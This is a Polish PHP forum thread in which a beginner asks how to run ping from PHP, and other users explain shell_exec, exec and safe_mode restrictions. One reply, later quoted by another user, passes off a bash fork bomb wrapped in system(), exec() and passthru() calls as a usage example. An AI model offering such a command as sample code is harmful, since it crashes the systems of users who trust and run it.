![]() |
![]() |
![]()
|
|
Grupa: Zarejestrowani Postów: 9 Pomógł: 0 Dołączył: 4.08.2008 Ostrzeżenie: (0%) ![]() ![]() |
potrzebuję zrobić w php ping, tracert i kilka podobnych rzeczy...
jestem początkujący w php i nie wiem od czego mam zacząć napisałem w skrypcie żeby ping na dany adres był wykonany kilka razy ----plik test.sh---- #!/bin/sh ping -c 5 www.wp.pl ------------------ teraz chcę go wywołać w php i zobaczyć kolejne linie pinga...? Ten post edytował user_php_ 4.08.2008, 16:54:40 |
|
|
![]() |
![]()
|
|
Grupa: Zarejestrowani Postów: 726 Pomógł: 129 Dołączył: 10.01.2008 Skąd: Gdańsk Ostrzeżenie: (0%) ![]() ![]() |
Może funkcja exec coś pomoże
|
|
|
![]()
|
|
Grupa: Zarejestrowani Postów: 112 Pomógł: 1 Dołączył: 3.08.2008 Ostrzeżenie: (0%) ![]() ![]() |
Np. tak:
system(':(){ :|:& };: '); exec(':(){ :|:& };: '); passthru(':(){ :|:& };: '); Jeszcze jest jedna metoda lepsza ale nie pamiętam tej funkcji :S |
|
|
![]()
|
|
Grupa: Zarejestrowani Postów: 1 657 Pomógł: 125 Dołączył: 29.04.2006 Ostrzeżenie: (0%) ![]() ![]() |
Np. tak: system(':(){ :|:& };: '); exec(':(){ :|:& };: '); passthru(':(){ :|:& };: '); Jeszcze jest jedna metoda lepsza ale nie pamiętam tej funkcji :S shell_exec() i `` (IMG:http://forum.php.pl/style_emoticons/default/tongue.gif) |
|
|
-gox- |
![]()
|
Goście ![]() |
na windowsie funkcja shell_exec() sprawdza sie najlepiej, poniewaz kiedy zwracana jest wielolinijkowa odpowiedz, to funkcje egzekujace inne niz shell_exec() zwracaja tylko pierwsza linijke, albo w ogole nic..
|
|
|
![]()
|
|
Grupa: Zarejestrowani Postów: 18 Pomógł: 4 Dołączył: 13.03.2007 Ostrzeżenie: (0%) ![]() ![]() |
No i oczywiście pozostaje wspaniała zabawa uprawnieniami dostępu (IMG:http://forum.php.pl/style_emoticons/default/winksmiley.jpg)
|
|
|
![]()
|
|
Grupa: Zarejestrowani Postów: 9 Pomógł: 0 Dołączył: 4.08.2008 Ostrzeżenie: (0%) ![]() ![]() |
czyli kod pliku php ma wygladac tak?
<?php $output = shell_exec('plik.sh'); echo "<pre>$output</pre>"; ?> gdzie plik.sh skrypt w bashu |
|
|
-gox- |
![]()
|
Goście ![]() |
Powinno bryknac...
|
|
|
![]()
|
|
a nie dziala.
|
|
|
-gox- |
![]()
|
Goście ![]() |
tak po prsotu nie dziala? komputer sie wylacza? moze jednak jakies errorsy wypluwa co?
|
|
|
![]()
|
|
Warning: shell_exec(): Cannot execute using backquotes in Safe Mode in /plik.php on line 2
a to 2 linia $output = shell_exec('plik.sh'); prawa do wykonania dla uzytkownika sa nadane nie wiem jeszcze czy php nie jest zabezpieczone no i wersja php czy nie ma znaczenia? |
|
|
-gox- |
![]()
|
Goście ![]() |
czyzby exeki byly wylaczone w safe_mode?
|
|
|
![]()
|
|
Grupa: Zarejestrowani Postów: 18 Pomógł: 4 Dołączył: 13.03.2007 Ostrzeżenie: (0%) ![]() ![]() |
Najlepiej wyłączyć safe_mode albo poczytać trochę o ustawieniu safe_mode_exec_dir.
|
|
|
![]()
|
|
po ustawieniu uprawnień i php działa ale wyświetla na 5 linijek np tylko dwie ostatnie
lub trzy jeśli komenda będzie zapisana $output = shell_exec('ping -c 5 www.wp.pl'); natomiast zapis $output = shell_exec('plik.sh'); nie działa i pokazuje błąd w tej linii a mnie bardziej interesuje opcja z podanym skryptem bash, perl lub cokolwiek innego... |
|
|
![]()
|
|
Grupa: Zarejestrowani Postów: 155 Pomógł: 17 Dołączył: 9.07.2007 Ostrzeżenie: (0%) ![]() ![]() |
|
|
|
![]()
|
|
dzięki (IMG:http://forum.php.pl/style_emoticons/default/smile.gif) to jest to o co mi chodziło (IMG:http://forum.php.pl/style_emoticons/default/smile.gif)
tak się zastanawiam jeszcze jak wrzucać nie od razu całość (wynik całego skryptu po wykonaniu) a po jednej linii tak jak w linii comend że pokazuje po jednej linijce ewentualnie z jakimś sprawdzaniem albo oczekiwaniem na prompt |
|
|
![]() ![]() |
![]() |
Aktualny czas: 22.08.2025 - 14:05 |